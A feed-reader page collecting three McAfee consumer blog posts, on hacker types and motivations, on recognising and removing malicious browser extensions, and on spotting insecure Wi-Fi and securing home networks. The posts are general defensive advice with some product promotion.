FreshRSS

🔒
❌ Secure Planet Training Courses Updated For 2019 - Click Here
☷
△ 🔃
There are new available articles, click to refresh the page.
Before yesterdaySecurity

7 Types of Hacker Motivations

By: McAfee

Hackers are not created equal, nor do they have the same purpose. Some hackers are paid to scrutinize security systems, find loopholes, fix weaknesses, and ultimately protect organizations and people. Others exploit those same gaps for profit, power, or disruption. What separates hackers isn’t just skill level or tactics; it’s intent. 

The purpose behind an attack changes everything about how hackers shape their tactics and how the hacking process unfolds: who is targeted, which methods and tools are used, how patient the attacker is, and the kind of damage they want to cause.

The primary motivations behind these cyberattacks fall into several categories, from financial gain to recognition, and sometimes even coercion. Each driver creates different risk scenarios for your digital life, from your home banking sessions to your workplace communications. Understanding a hacker’s motivations will enable you to better protect yourself and recognize potential threats in both your personal and professional life. 

In this article, we’ll look at the main types of hackers you might encounter, the core motivations and mindset that drive these cyberattacks, and finally, how you can protect yourself against these attacks.

Good and bad hackers

From its beginnings as an intellectual exploration in universities, hacking was driven by curiosity, learning, and the thrill of solving complex problems. Today, it has become industrialized with organized criminal groups and state-sponsored actors entering the scene. 

Modern hacking has seen the emergence of advanced persistent threats and nation-state campaigns targeting critical infrastructure and combining traditional techniques with artificial intelligence. To better understand the types of hackers, here is a window into what they do and why:

White hat hackers

These are the good guys, typically computer security experts who specialize in penetration testing and other methodologies to ensure that a company’s information systems are secure. These IT security professionals rely on a constantly evolving arsenal of technology to battle hackers.

Black hat hackers

These are the bad guys, who are typically referred to as just plain hackers. The term is often used specifically for hackers who break into networks or computers, or create computer viruses. Unfortunately, black hat hackers continue to technologically outpace white hats, often finding the path of least resistance, whether due to human error or laziness, or with a new type of attack. Hacking purists often use the term “crackers” to refer to black hat hackers, whose motivation is generally to get paid.

Script kiddies

This is a derogatory term for black hat hackers who use borrowed programs to attack networks and deface websites in an attempt to make names for themselves. Script kiddies, sometimes called script kitties, might be beginners, but don’t be fooled by their newbie status. With the right tools and right targets, they can wreak as much havoc as a seasoned hacker.

Hacktivists

Some hacker activists are motivated by politics or religion, while others aim to expose wrongdoing or exact revenge. Activists typically target government agencies, public services, and organizations involved in controversial issues related to defense, elections, wars, finance, or social movements. They also attack high-profile individuals, such as executives, public figures, journalists, and activists.

State-sponsored hackers

State-sponsored hackers have limitless time and funding to target civilians, corporations, other governments, or even prominent citizens connected to a larger objective. Their motivations are driven by their government’s strategic goals: gathering intelligence, stealing sensitive research or intellectual property, influencing public perception, or disrupting critical infrastructure. Because they are playing a long game, state-sponsored hackers are stealthy and persistent, quietly embedding themselves in systems, mapping networks, and waiting for the right moment to act.

Spy hackers

Corporations hire hackers to infiltrate their competitors and steal trade secrets, including product designs, source code, pricing plans, customer lists, legal documents, and merger or acquisition strategies. They may hack from the outside or gain employment in order to act as a mole, impersonating recruiters, partners, or vendors to get insiders to share access. They also take advantage of weak internal controls, such as excessive permissions, unsecured file-sharing links, or poor offboarding practices. Spy hackers may use similar tactics as hacktivists or state-sponsored espionage on a smaller scale: stealthy entry, careful privilege escalation, and long-term persistence to avoid triggering alarms. The stolen data is often not leaked publicly but delivered directly to the client and used behind the scenes.

Cyber terrorists

These hackers, generally motivated by religious or political beliefs, attempt to create terror, chaos, and real-world harm by disrupting critical infrastructures such as power grids, water systems, transportation networks, hospitals, emergency services, and government operations. They combine cyber operations with propaganda campaigns and physical attacks on the systems people rely on to live safely to create turmoil far beyond the screen. 

Understand hackers’ motivations

Cybercriminals aren’t just faceless entities; they’re driven by specific goals that shape their tactics and targets. Understanding their motivations empowers you to recognize potential threats and better protect yourself, your family, and colleagues.

Financial gain

Money remains the most common motivator. These profit-driven attacks directly impact your personal finances through methods such as ransomware, credit card fraud, and identity theft. In your home, financially motivated hackers target your banking apps, shopping accounts, and personal devices to steal payment information or hold your data hostage. In the workplace, they focus on payroll systems, customer databases, and business banking credentials.

Ideological motivations

Ideologically driven hackers, called hacktivists, pursue political or social causes through cyber means. These attacks can disrupt services that you rely on daily, from public utilities to private organizations that provide essential services or take public stances on divisive issues. Your best defense involves staying informed about potential disruptions and maintaining backup communication methods for essential services.

Curiosity and learning

Many hackers begin their journey with genuine curiosity about how systems work. They might probe your home network, test website security, or experiment with app vulnerabilities, not necessarily for malicious purposes, but their activities can still expose your data or disrupt services. In professional environments, these individuals might target systems or databases simply to see if they can gain access.

Recognition and reputation building

Some hackers seek fame, respect within hacker communities, or professional advancement rather than immediate financial benefit. They often target high-profile individuals, popular websites, or well-known companies to maximize the visibility for their exploits. If you have a significant social media following, your accounts could become targets for these attacks. They might also focus on defacing company or government websites, or leaking non-sensitive but embarrassing information.

State and corporate intelligence

Nation-state and corporate espionage are some of the most sophisticated threats in cyberspace, making it a top national security concern for both government and private sector. These operations compromise daily services and infrastructure such as internet service providers, email platforms, or cloud storage services to gather intelligence such as intellectual property, customer lists, or strategic planning documents. 

Coercion and extortion

Some hackers use cyber capabilities to intimidate or coerce victims into specific actions. In the FBI’s Internet Crime Complaint Center report for 2024, extortion was the 2nd top cybercrime by number of complaints, demonstrating the growing prevalence of coercion-based attacks. Coercion might involve compromising personal photos, social media accounts, or private communications to demand payment or behavioral changes. Workplace coercion could target executives with embarrassing information or threaten to leak sensitive business data unless demands are met. 

The intersection of motivations

Many real-world attacks combine multiple motivations—a financially driven criminal might also seek recognition within hacker communities, or an ideological hacker might generate revenue through ransomware. The contrast between ethical hacker motivations and malicious ones often lies in the permission, legality, and intent. Understanding why people become hackers helps you recognize that not all hacking activity is inherently malicious, although all unauthorized access ultimately poses risks to your security and privacy.

The psychology behind cyberattacks

Understanding the psychology behind cyberattacks gives you a powerful advantage in protecting yourself. When you know what drives hackers, you can better spot their tactics and stay one step ahead.

High reward, low risk

Many hackers operate with the goal of achieving high reward for perceived low risk. This risk-reward imbalance motivates attackers because they can potentially access valuable personal or financial information while remaining physically distant from their victims. This means hackers often target easy opportunities, such as when you click on suspicious links or download questionable attachments, to gain access with minimal effort. For instance, a hacker would rather send 10,000 phishing emails hoping for a few bites than attempt one complex, risky attack.

Exploiting normal human responses 

Hackers exploit well-known psychological shortcuts your brain takes. They understand that you’re more likely to trust familiar-looking emails, act quickly under pressure, or follow authority figures without question. These aren’t weaknesses, these are normal human responses that attackers deliberately manipulate. For example, urgent messages claiming your account will be closed create an artificial time pressure, making you more likely to click without thinking.

The power of group dynamics

Many successful cyberattacks leverage the human tendency to follow what others are doing. Hackers create fake social media profiles, forge customer reviews, or impersonate colleagues to make their requests seem legitimate and widely accepted. In ransomware attacks targeting businesses, criminals often research company hierarchies and communication styles to make their demands appear to come from trusted sources within the organization. 

The gamification of cybercrime

Modern hacking has elements that make it feel like a game to perpetrators. Some online forums award points for successful attacks, creating competition and recognition among criminals. This helps explain why some hackers target individuals rather than large corporations, as every successful phishing attempt becomes a score, and why attacks continue to evolve. 

Common hacking methods

Hackers don’t all use the same tricks, but most successful attacks rely on a familiar toolkit of methods that exploit common technical gaps and human habits. Recognizing these common techniques will help you avoid danger earlier on.

  • Phishing and smishing. These attacks trick you into revealing sensitive information through fraudulent emails or text messages, respectively known as phishing and smishing. Modern attackers increasingly use AI-generated content and sophisticated social engineering techniques that make these messages appear more legitimate than ever before. 
  • Credential stuffing. Cybercriminals use automated tools to test stolen username and password combinations across multiple websites, exploiting the fact that many people reuse passwords. This attack method has become more efficient with attackers leveraging large-scale data breaches and improved automation tools.
  • Multi-factor authentication (MFA) fatigue. Attackers repeatedly send multi-factor authentication requests until overwhelmed, frustrated, and confused users approve one. This technique has gained prominence as more organizations adopt MFA, with attackers finding ways to exploit user behavior around security notifications. 
  • Malvertising. Malicious advertisements on legitimate websites can install malware or redirect you to harmful sites without requiring any clicks. Recent trends show attackers using sophisticated techniques to bypass ad network security filters. 
  • Remote desktop attacks. Hackers exploit weak or default passwords on remote desktop services to gain unauthorized access to systems, particularly targeting businesses with remote work setups. The rise of hybrid work environments since 2023 has made this attack vector increasingly attractive to cybercriminals. Disable remote desktop services when not needed and use VPNs with strong authentication for legitimate remote access.
  • USB baiting. Attackers leave infected USB devices in public places, hoping curious individuals will plug them into their computers, automatically installing malware. Modern USB attacks can execute within seconds of being connected, making them particularly dangerous in today’s fast-paced work environment.
    • Unsecured Wi-Fi networks. Unsecured public Wi-Fi and home networks create opportunities for hackers to gain access to your devices or intercept your sensitive information, such as passwords, emails, and banking details. Sometimes, cybercriminals create fake Wi-Fi hotspots with legitimate-sounding names to trick users into connecting.
    • Unsafe downloads. Hackers disguise malicious software as legitimate programs, games, documents, or updates to trick users into installing them. These malicious downloads may come from infected email attachments, fake or pirated software, or even compromised websites. Once installed, the malware can steal your information, lock your files for ransom, or give hackers access to your computer.
    • Tech support scams. Tech support scams rely on social engineering rather than technical exploits, where scammers typically contact you by phone and insist your computer has been infected or compromised. They create urgency and fear to convince you to install remote access software that gives them complete control of your computer. Once they have access, they can steal personal information, install malware, or hold your files hostage.
    • Outdated software. Running outdated software creates security vulnerabilities that hackers actively leverage. When software developers discover security vulnerabilities, they release patches to fix these problems. If you don’t install these updates promptly, your system remains vulnerable to attacks. Hackers maintain databases of unpatched systems and use automated tools to find and exploit them.

    Defensive tips to protect yourself from hack attacks

    Your strongest defense against hacking combines technical safeguards, security awareness, and some consistent habits that shut down the most common paths attackers use. Here’s how to put those defenses in place and make your digital life a much harder target.

    • Install comprehensive security software. The Cybersecurity and Infrastructure Security Agency recommends a layered security approach to prevent multiple types of threats simultaneously. Choose a reputable security suite that offers real-time protection, anti-malware scanning, and web browsing safety features. 
    • Enable MFA everywhere. Add an extra security layer to all your important accounts: email, banking, social media, and work platforms. Only approve MFA requests that you initiated yourself, and report any unexpected authentication prompts to your IT team or service provider immediately.
    • Use a password manager. Create complex, unique passwords using a trusted password manager for every account you own. The National Institute of Standards and Technology recommends passwords that are at least 12 characters long and completely unique across all your accounts to prevent credential stuffing attacks.
    • Keep all software updated. Enable automatic updates for your operating system, apps, and security software, as many successful cyberattacks exploit known weaknesses that could have been prevented with timely updates.
    • Secure your internet connections. Avoid using public Wi-Fi for sensitive activities, and use a reputable VPN when you must connect to untrusted networks. Unsecured public networks make it easy for attackers to intercept your data and credentials.
    • Implement the 3-2-1 backup strategy. Regular, tested backups are your best defense against ransomware and data loss incidents. Keep three copies of important data—on your device, on an external drive, and in secure cloud storage. 
    • Develop scam-spotting skills. Scammers continuously adapt their tactics to current events, so staying informed about the latest schemes and learning to recognize phishing emails, suspicious links, and social engineering tactics will help you stay one step ahead.
    • Practice good digital hygiene. Regularly review your account permissions, remove unused apps, and monitor your financial statements for unauthorized activity to lessen your exposure to identity theft and privacy breaches.
    • Monitor your accounts regularly. Check bank statements, credit reports, and account activity monthly. Set up account alerts for unusual activity when available.
    • Limit personal information sharing. Only provide the necessary information to companies or service providers to reduce your digital footprint. In addition, review privacy settings and avoid oversharing on social media as scammers and hackers regularly prowl these platforms. 

    Final thoughts

    Now that you understand hackers’ motivations and psychological drivers, you can flip the script and turn it to your advantage. Instead of being the target, become the informed defender who recognizes manipulation tactics and responds thoughtfully rather than reactively. This knowledge empowers you to spot potential threats earlier, choose stronger protective measures, and navigate the digital world with greater confidence.

    When someone pressures you to act immediately, that’s your cue to slow down and verify the request. Question familiar-looking messages, even if they look official. Check the sender’s address and contact the company through official channels. Trust your instincts and investigate before acting. Stay curious and keep learning from reputable cybersecurity resources that publish current research and threat intelligence. Share these tips with your family members and friends, especially those who might be less technologically savvy. 

    McAfee+ includes proactive identity surveillance to monitor subscribers’ credit and personal information, as well as access to live fraud resolution agents who can help subscribers work through the process of resolving identity theft issues.

    The post 7 Types of Hacker Motivations appeared first on McAfee Blog.

    Learn to Identify and Avoid Malicious Browser Extensions

    By: McAfee Labs

    Browser extensions have become essential parts of how we browse, bank, work, and shop online. From password managers to ad blockers, these tools can significantly improve your digital life when chosen wisely. Chief among these are browser plug-ins, which extend its functionality. Almost all popular browsers support these extensions, unfortunately, making them one of the most commonly used malware attack vectors.

    In this guide, you will learn about the advantages and security risks of browser extensions, the role that permissions play in ensuring your privacy when using these extensions, and some best practices when using them.

    Browser extensions and their malicious counterparts

    Browser extensions are small software programs that enhance your web browser by adding new functionality or modifying existing ones. Think of them as helpful extra tools that can block ads, manage passwords, check prices while shopping, or customize how websites look and behave. Legitimate extensions make your browsing experience more efficient and enjoyable.

    Cybercriminals, however, have taken advantage of their popularity by creating malicious versions disguised as useful tools that secretly operate with harmful intentions. Some of these malicious browser extensions access and modify web pages, monitor your browsing activity, and interact with websites on your behalf.

    While legitimate extensions request only the minimum permissions necessary for their stated purpose, malicious extensions often request more permissions than they need to access your browsing data and history.

    Core tactics of malicious browser extensions

    Malicious browser extensions typically operate through specific methods that can significantly impact your daily online activities, from casual browsing to important financial transactions, including:

    • Permission abuse occurs when an extension requests far more access than it needs to operate. For example, a weather extension that claims to show local forecasts might request permission to track the websites you visit, allowing it to monitor everything you do online and capture sensitive information such as passwords and credit card numbers without your knowledge.
    • Ad injection is where malicious extensions insert unwanted advertisements into web pages you’re viewing, appearing as pop-ups, banner ads, or even replacing legitimate advertisements with malicious ones. These injected ads disrupt your browsing experience, can lead to scam websites, or attempt to trick you into downloading additional malware.
    • Data theft is one of the most serious threats posed by malicious extensions. These programs can silently capture everything you type, including usernames, passwords, credit card information, and personal details, exposing your personal information to cybercriminals. When you log into your online banking or online shopping account, the malicious extension might record your login credentials and account information.
    • Traffic redirection involves redirecting your legitimate web traffic to scam websites designed to steal your information or trick you into making fraudulent purchases. This is particularly dangerous when you’re trying to access your bank’s website or other financial services, but are redirected to a convincing fake site that could capture your login credentials.
    • Drive-by downloads can be triggered by these ill-intentioned browser extensions when you visit specific websites, click on seemingly innocent links or files, or even during routine browsing activities. The links and files are disguised as legitimate software updates, media files, or useful applications that, in fact, could infect your device with ransomware, keyloggers, or other types of malware.
    • Cryptocurrency mining extensions secretly use your computer’s processing power to mine cryptocurrency for the extension creator, running resource-intensive calculations in the background without your knowledge or consent. This unauthorized mining activity causes your device to run more slowly, drain your laptop battery faster, consume more electricity, generate excess heat, and potentially shorten your hardware’s lifespan.

    The impact of malicious browser extensions

    If not caught, malicious extensions can disrupt your daily life and compromise your personal security.

    Malicious extensions violate your privacy when they monitor your online behavior and track the websites you view, build a profile of your habits and preferences, and even obtain your home address and other personal details. These details can be used for identity theft, social engineering attacks, or sold to data brokers, ultimately compromising your privacy and potentially affecting your real-world safety and financial security.

    When it comes to online shopping, some malicious extensions could pressure you into hasty purchase decisions, intercept your checkout process, and capture your payment information. Once cybercriminals have your shopping account credentials, they can impersonate you to make unauthorized purchases.

    Similar incidents could happen with your banking and financial accounts. Malicious browser extensions can steal your login credentials, account numbers, transaction details, and eventually your money. Some cybercriminals have gone as far as opening new accounts and applying for loans using your stolen information.

    The most insidious aspect of malicious browser extensions is their ability to operate silently in the background while maintaining the appearance of legitimate functionality. A malicious extension might continue providing its advertised service—such as weather updates or price comparisons—while simultaneously conducting harmful activities, making them effective at avoiding detection.

    On top of the higher electricity bills, degraded device performance and browsing experience, and wasted network bandwidth, malicious extensions violate your values by turning your device into an unwitting money-making tool for cybercriminals while you bear the operational costs. Furthermore, malicious extensions could potentially expose you to additional malware or scams, and involve you in fraudulent advertising schemes.

    Their impact extends beyond your own device and could affect your entire household. On the shared networks and devices, malicious extensions can spread and compromise other users.

    Guidelines to stay safe with browser extensions

    Chrome extensions can absolutely be safe to use when you approach them with the right knowledge and precautions. The vast majority of extensions on the official Chrome Web Store undergo Google’s review process and are built by legitimate, reputable developers who aim to enhance your browsing experience and follow security best practices.

    Additionally, the Chrome Web Store’s rating system and user reviews provide valuable insights into an extension’s reliability and performance. When you stick to well-established extensions with thousands of positive reviews and regular updates, you’re generally in safe territory.

    However, the extension ecosystem does present a few security challenges. The primary risks come from two main areas: permission abuse and post-installation behavior changes. When you install an extension, you give it permission to access various aspects of your browsing data and your device. Some extensions may request more permissions than they actually need, creating potential privacy and security vulnerabilities. Even more concerning, some extensions start with benign functionality but later receive updates that introduce malicious features or get sold to malicious actors who update them with data-harvesting capabilities, turning a once-safe extension into a potential threat.

    To help you navigate these challenges safely, here’s a practical risk assessment framework you can use before installing any Chrome extension. This systematic approach takes just a few minutes but can save you from potential headaches down the road.

    Step 1: Evaluate the source’s reputation

    Start by examining who created the extension. Look for extensions developed by well-known companies or developers with established track records. Check the developer’s website and other extensions they’ve created. Extensions from companies like Google, Microsoft, or other recognized tech firms generally carry lower risk profiles. For individual developers, look for those who maintain a professional online presence and have created multiple successful extensions.

    Step 2: Analyze user reviews and ratings

    Don’t just glance at the overall star rating. Read the actual reviews, look for patterns in user feedback, and pay special attention to recent comments that might indicate changes in the extension’s behavior. Be wary of extensions with suspiciously perfect ratings or reviews that seem artificially generated. Legitimate extensions typically have a mix of ratings with detailed, specific feedback from real users.

    Step 3: Examine permission requests carefully

    This is perhaps the most critical step in your assessment. When you click “Add to Chrome,” pay close attention to the permission dialog that appears. Question if the requested permissions make sense for the tool’s functionality and be particularly cautious of extensions requesting broad permissions such as “Read and change all your data on the websites you visit.”

    Step 4: Check installation numbers and update history

    Extensions with millions of users and regular updates are generally safer bets than those with just a few hundred installations. However, don’t let high installation numbers alone convince you. Look for extensions that receive regular updates, which indicates active maintenance and ongoing security attention from developers.

    Step 5: Research recent security issues

    Before installing, do a quick web search for the extension name with terms like “security,” “malware,” or “removed.” This will reveal any recent security incidents or concerns that other users have reported. Security researchers and tech blogs often publish warnings about problematic extensions, information that can be invaluable in your decision-making process.

    Ongoing browser security

    The security landscape changes constantly, and extensions that are safe today might develop problems in the future. This is why ongoing vigilance is just as important as your initial assessment.

    • Install only as needed: Adopt a minimalist approach to installing extensions, as every browser extension you add increases your attack surface. Only install those you absolutely need.
    • Regularly audit your installed extensions: Set a reminder to review your extensions every few months, removing any that you no longer use or that haven’t been updated recently. This reduces your attack surface and helps keep your browser running efficiently.
    • Be wary of unrealistic benefits: When adding new browser extensions, be cautious of those that promise fantastic functions such as dramatically increasing internet speed or providing access to premium content for free. Extensions that require you to create accounts with suspicious email verification processes or that ask for payment information outside of Google’s official channels should also raise red flags.
    • Be cautious of duplicate functions: Be suspicious if the extension is replicating functionality already built into Chrome, as these often exist primarily to harvest user data. Extensions with generic names, poor grammar in their descriptions, or unprofessional-looking icons and screenshots indicate lower development standards and potentially higher security risks.
    • Install only from official stores: While not perfect, official browser stores offer significantly more security oversight than third-party sources or direct installation methods. Their layers of security screening include automated malware detection, manual code reviews for popular extensions, continuous monitoring for suspicious behavior, review systems, and developer verification processes.
    • Enable automatic updates and smart monitoring: Browser updates often include enhanced extension security and additional protection mechanisms that help detect and prevent malicious extension behavior. In addition, implement a monitoring system to identify extensions that update unusually frequently or at suspicious times, such as during periods you’re less likely to notice behavioral changes.
    • Deploy comprehensive protections: Integrate your browser extension security with broader security measures that can monitor extension behavior and detect suspicious activities such as unauthorized data access, unexpected network connections, or attempts to modify system files. These tools use behavioral analysis and machine learning to identify malicious patterns that might not be apparent through manual observation.
    • Secure your shopping and banking accounts: Your financial transactions and shopping activities represent high-value targets that need specialized protections. Consider using a dedicated browser for financial activities to isolate your transactions or temporarily disable extensions not related to security or privacy. Enable multi-factor authentication to prevent unauthorized access even if a malicious extension captures your primary login credentials.
    • Create a positive security routine: Establish straightforward security routines that include the measures listed above to ensure that your shopping, banking, and general browsing activities remain secure while still allowing you to benefit from the enhanced functionality that well-designed extensions provide.

    Thankfully, Google continues to improve its security measures for the Chrome Web Store by implementing stricter review processes for extensions and enhancing its ability to detect and remove malicious extensions after they’ve been published. For additional protection, enable Chrome’s Enhanced Safe Browsing, under the browser’s Privacy and Security section.

    Malicious browser extensions also pose similar threats across all major browser ecosystems, with attackers targeting the same vulnerabilities: excessive permissions, post-installation payload updates, and social engineering tactics.

    Safari’s extension model, while more restrictive, still allows extensions to access browsing data and modify web content when you grant permissions. Microsoft Edge, built on Chromium, shares Chrome’s extension architecture and therefore inherits many of the same security challenges, though Microsoft has implemented additional screening measures for their Edge Add-ons store. Regardless of which browser you use, the fundamental protection strategies remain consistent.

    Action plan if you’ve installed a malicious extension

    If you suspect you’ve installed a malicious browser extension by mistake, speed matters in the race to protect your accounts. Follow this clear, step-by-step guide to remove the extension, secure your accounts, and check for any signs of compromise.

    1. Immediately disconnect sensitive accounts: Sign out of all banking, shopping, and financial accounts you’ve accessed recently. Malicious extensions can capture session tokens and credentials in real-time, making immediate disconnection critical to prevent unauthorized access.
    2. Remove the malicious extension completely: Open your browser settings and navigate to the Extensions or Add-ons section. Locate the suspicious extension and click “Remove” or “Uninstall.” Don’t just disable it. Check for related extensions that may have been installed simultaneously, as malicious extensions often come in bundles.
    3. Clear all cookies and site data: Go to your browser’s privacy settings and clear all stored cookies, cached data, and site data to remove persistent tracking mechanisms or stored credentials the malicious extension may have accessed or modified. Pay special attention to clearing data from the past 30 days or since you first noticed suspicious activity.
    4. Change all your passwords immediately: Start with your most sensitive accounts—banking, email, and work credentials—followed by all other accounts. Use strong, unique passwords that will make it difficult for the malicious extensions to attempt to access your accounts again. As mentioned earlier, enable multi-factor authentication.
    5. Run a comprehensive security scan: Use reputable security software such as McAfee+ to perform full system scans on all devices where you’ve accessed sensitive accounts. Because malicious extensions can download additional malware or leave traces, it is best to schedule follow-up scans over the next few days to catch any delayed payloads.
    6. Review all account activity thoroughly: Many malicious extensions operate silently for weeks before executing their primary payload. So keep monitoring your login history, transaction records, and changes in account settings across all your accounts, and look for any unauthorized transactions.
    7. Set up account alerts: Set up automated account alerts for all transactions and closely monitor your bank and credit card statements for the next 60-90 days. Place fraud alerts with major credit bureaus if you suspect identity information may have been compromised.

    Final thoughts

    Browser extensions offer great functionality and convenience, but could introduce cybersecurity risks. With the right combination of smart browsing habits, regular security audits, and comprehensive protection tools, and staying informed, you can safely explore the web, manage your finances online, and shop without worry.

    Make it a habit to question your intent to install a new extension, and download only from official browser stores. Review your installed extensions monthly—determine if each one still serves your needs. These practices, combined with keeping your browser and operating system updated, and employing trusted security software, reinforce your defense against evolving online threats. Remember to research any new browser extensions thoroughly before installation, checking developer credentials and reading recent user reviews to identify which browser extensions to avoid.

    The post Learn to Identify and Avoid Malicious Browser Extensions appeared first on McAfee Blog.

    Verify Secure Wireless Networks to Prevent Identity Theft

    By: McAfee

    The ability to connect wirelessly is indispensable in our lives today. Wireless internet is available in our homes, offices, cafes, restaurants, parks, hotels, airports, cars, and even airplanes. The mobility factor allows us to work anytime, anywhere, on numerous devices. “Being connected” is at an all-time high.

    Wireless internet is amazing and convenient. Sadly, unsecured, unprotected wireless is everywhere. When a device connects to unprotected Wi-Fi, all the data stored on that device becomes accessible to a hacker using the proper sniffing tools.

    It is, however, possible to protect your Wi-Fi from being hacked. In this article, we’ll walk you through some practical steps to stay protected when you connect, from recognizing dangerous networks to securing your home Wi-Fi. We’ll also show you what to do if you think you’ve been targeted.

    What is a wireless network attack?

    Wireless network attacks happen when cybercriminals target your Wi-Fi connection to steal your personal information. It it’s equivalent to digital eavesdropping, where attackers exploit weaknesses in your wireless connection to intercept all the information you send and receive online.

    Criminals can intercept your login credentials as you type them, redirect you to legitimate-looking but fake websites, or even impersonate you online using stolen information. The goal is often wireless identity theft, that is, using your compromised data for financial fraud or other malicious purposes.

    The risks of unprotected Wi-Fi are particularly high because many wireless networks lack proper security measures. When you connect to an unsecured network, your data travels in a way that skilled attackers can capture and decode. This puts your banking information, social media accounts, work credentials, and personal communications at risk.

    Common wireless attacks include creating fake hotspots that mimic legitimate networks, known as evil twins, intercepting data on public Wi-Fi, and using specialized software to crack network passwords.

    Wi-Fi security weaknesses that enable hacking

    Cybercriminals usually circumvent wireless network security in several ways, including:

    • Outdated Wi-Fi encryption: Networks still using WEP or older WPA/WPA2 protocols without security updates create easy targets for wireless identity theft. For more stringent security, your router settings should indicate the more current WPA3 or the latest WPA2-AES encryption.
    • Weak default passwords: Many routers ship with simple default passwords like “admin” or “password123.” When you set up your home Wi-Fi router, make sure to change the router’s default network name and password to at least 12 characters that combine words, numbers, and symbols.
    • Default network names: Keeping your router’s default network name broadcasts your device model to potential attackers. Rename your network to something that doesn’t identify your router brand and model, nor your address or family name.
    • Rogue access points and evil twins: Cybercriminals can set up fake Wi-Fi networks that mimic legitimate ones to intercept your data and steal your identity.
    • Poorly configured guest networks: Guest networks without proper isolation can expose your main network and connected devices to hacking risks.
    • Outdated router firmware: Router manufacturers regularly release firmware updates to patch security vulnerabilities. Running outdated firmware leaves your network exposed to known threats.
    • Unsecured Internet of Things (IoT) devices: IoT home devices such as smart TVs, security cameras, voice assistants, and other smart appliances often have weak security settings and can serve as entry points for attackers seeking to compromise your network, especially if not isolated on a separate network.

    What hackers can do after hacking your Wi-Fi

    Once scammers gain access to your home or an unsecured public Wi-Fi network, they can launch several types of wireless attacks that directly put your personal information and financial security at risk.

    Credential theft and account takeovers

    One of the most common dangers is credential theft, where attackers intercept your login information as it travels over unsecured networks. When you check your email, log into social media, or access work accounts on a compromised Wi-Fi network, cybercriminals can capture your usernames and passwords. This wireless identity theft often leads to unauthorized access to your bank accounts, credit cards, and personal profiles.

    Session hijacking and traffic sniffing

    In session hijacking, attackers take over your current online activities on public Wi-Fi, then impersonate you on websites and services you’re logged into. This tactic is called the man-in-the-middle attack. They might apply for credit cards in your name, make purchases, or even commit crimes while pretending to be you. Through traffic sniffing, they can monitor all data flowing through the compromised networks, capturing everything from personal messages to financial information.

    Traffic redirection to fake sites

    Cybercriminals will also reroute your internet traffic to malicious websites that look similar to legitimate ones. You think you’re logging into your real bank website, but you’re actually entering your credentials into a scammer’s fake site. This technique, known as DNS poisoning, makes it nearly impossible to detect the deception until it’s too late.

    Malware installation

    The attackers will push malicious software directly onto your devices, enabling them to log every keystroke you make, steal stored passwords, access your files, and even quietly activate your camera or microphone without your knowledge.

    Device surveillance

    Hackers can monitor not only your device but all connected devices on your network. That means they can access your entire family’s browsing habits, private messages, stored photos and documents, and online activities, giving them detailed personal information for their identity theft schemes.

    These attacks directly affect your daily activities, from online banking to e-commerce shopping to working from home. Even simple tasks, such as checking social media, can result in identity theft when conducted over compromised networks.

    Actions to verify a secure wireless network

    You don’t have to avoid public Wi-Fi entirely. By being aware of these risks and taking appropriate precautions, you can significantly reduce your exposure to wireless identity theft. The protective measures we’ll explore in the following sections will show you how to recognize dangerous networks, browse safely, and maintain your privacy even when using public connections.

    • Look for the missing lock icon: In your Wi-Fi settings, secure networks display a lock symbol next to the network name. Networks without this icon are open and unencrypted, making your data vulnerable to anyone within range.
    • Avoid generic or suspicious network names: Be wary of networks with names like “Free WiFi,” “Public,” “Guest,” or random combinations of letters and numbers. Legitimate businesses typically use their brand name in their network identifier.
    • Question misspelled business names: If you’re at a Starbucks cafe but see a network called “Starbuckz” or “Starbucks_Free,” it could be a fake network designed to steal your information. Always verify the correct network name with the staff.
    • Check for HTTPS on captive portals: When connecting to public Wi-Fi that requires you to accept terms or log in through a web page, ensure the login page URL starts with “https://” and shows a lock icon in your browser’s address bar.
    • Be cautious in unfamiliar locations: Networks appearing in unexpected places, such as “Coffee Shop WiFi” in a residential area or multiple networks with similar names in one location may indicate malicious hotspots.
    • Verify encryption type: Right-click the network in your Wi-Fi list and navigate to Properties > Security type. A secure network will use WPA2 or WPA3 encryption, while “Open” or “WEP” indicates weak or no protection.
    • Heed certificate warnings: If your device displays security certificate errors or warnings when connecting to public Wi-Fi, make sure to follow them. These alerts could indicate security risks or man-in-the-middle attacks.

    Recognize and respond to a Wi-Fi hacking incident

    If you suspect your Wi-Fi network has been compromised, don’t panic. Recognizing the warning signs early and taking decisive action can protect your identity and restore your network security.

    The most common indicators of a compromised network include unexpected slowdowns in your internet speed, unfamiliar devices appearing on your network, and settings that have changed without your knowledge. You might also notice unusual data usage patterns, your router admin password no longer working, or being redirected to suspicious websites when browsing. When you detect these signs, take quick action.

    Immediate steps to take

    1. Immediately disconnect affected devices: As soon as you suspect a compromise, disconnect all devices from your Wi-Fi network to prevent further unauthorized access and limit potential damage from identity theft attempts.
    2. Change your router admin password first: Access your router’s admin panel and immediately update the administrator password to something strong and unique to block attackers from regaining access to your network settings.
    3. Update your Wi-Fi network password. Create a new, complex Wi-Fi password using a combination of letters, numbers, and symbols. Use at least 12 characters for wireless networks.
    4. Install the latest firmware updates: Check your router manufacturer’s website for recent firmware updates that patch security vulnerabilities.
    5. Review and remove unknown devices. Use your router’s device management features to identify and remove any unauthorized devices from your network’s allowed devices list.
    6. Enable WPA3 security if available: Upgrade to WPA3 encryption if your router supports it for enhanced protection from the wireless exploits that commonly affect older security protocols.
    7. Perform a factory reset if necessary: If you cannot identify the source of the compromise or if multiple security indicators persist, reset your router to factory defaults and reconfigure it with strong security settings.

    Ongoing safeguards against Wi-Fi hacking

    1. Change your router’s admin and Wi-Fi passwords regularly: Your router’s default credentials are often publicly available online, making them easy targets for wireless identity theft. Create strong, unique passwords for both your router’s admin panel and Wi-Fi network. Update them every 3-6 months and immediately if you suspect any unauthorized access.
    2. Disable WPS (Wi-Fi Protected Setup) on your router: WPS creates a convenient backdoor that hackers can exploit through brute-force attacks. Access your router’s admin panel and turn off WPS completely. This simple step closes a major vulnerability that wireless exploits often target.
    3. Set up a separate guest network for visitors and IoT devices: Isolating your main devices from guest access and smart home gadgets reduces the risks of unprotected Wi-Fi spreading throughout your network. Configure guest network access with time limits and bandwidth restrictions to maintain better control over your network security.
    4. Turn off SSID QR code sharing and disable automatic network sharing: Many modern devices offer convenient network sharing through QR codes or automatic syncing, but these features can inadvertently expose your credentials. Disable these options in your device settings and share Wi-Fi access manually when needed.
    5. Properly wipe devices before selling, donating, or disposing of them: Your old devices store Wi-Fi passwords and network configurations that could compromise your security long after disposal. Perform factory resets and use secure wiping tools to ensure all saved network credentials are completely removed from the device’s memory.
